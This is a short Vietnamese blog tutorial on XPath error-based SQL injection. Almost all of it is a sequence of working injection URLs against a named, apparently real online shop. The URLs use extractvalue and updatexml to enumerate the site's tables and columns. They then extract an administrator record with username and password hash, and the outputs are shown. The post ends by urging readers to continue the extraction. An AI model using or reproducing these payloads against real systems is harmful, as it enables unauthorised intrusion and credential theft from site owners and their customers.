Sunday, May 18, 2014

Hack SQLi dạng X-path


Tut SQLi dạng X-path
Get version:
http://www.boutiqueoffbroadway.com/info_page.php?id=6+and+extractvalue(rand(),concat(0x7e,version()))--
--> XPATH syntax error: '~5.5.36-cll'

Getting The Tables:
http://www.boutiqueoffbroadway.com/info_page.php?id=6+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))--
--> '~address_book'
Ta tăng limit lên để tìm Tables tiếp theo
http://www.boutiqueoffbroadway.com/info_page.php?id=6+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+1,1)))--
--> '~address_format'
http://www.boutiqueoffbroadway.com/info_page.php?id=6+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+2,1)))--
--> '~administrators' (nó đây rồi)

Getting Column:
http://www.boutiqueoffbroadway.com/info_page.php?id=6+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=0x61646d696e6973747261746f7273+limit+0,1)))--
--> '~id'
Ta tăng limit lên để tìm Column tiếp theo
http://www.boutiqueoffbroadway.com/info_page.php?id=6+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=0x61646d696e6973747261746f7273+limit+1,1)))--
--> '~user_name'
http://www.boutiqueoffbroadway.com/info_page.php?id=6+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=0x61646d696e6973747261746f7273+limit+2,1)))--
--> '~user_password'

Getting Data:
http://www.boutiqueoffbroadway.com/info_page.php?id=6+and+updatexml(0x7e,concat(0x7e,((select+concat(id,0x7e,user_name,0x7e,user_password)+from+administrators+limit+0,1))),0)--
--> '~3~offbroadwayboutique~37b93056a'
Ta tăng limit lên để tìm thông tin tiếp theo :-)

Được đăng bởi vào lúc
Nhãn: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)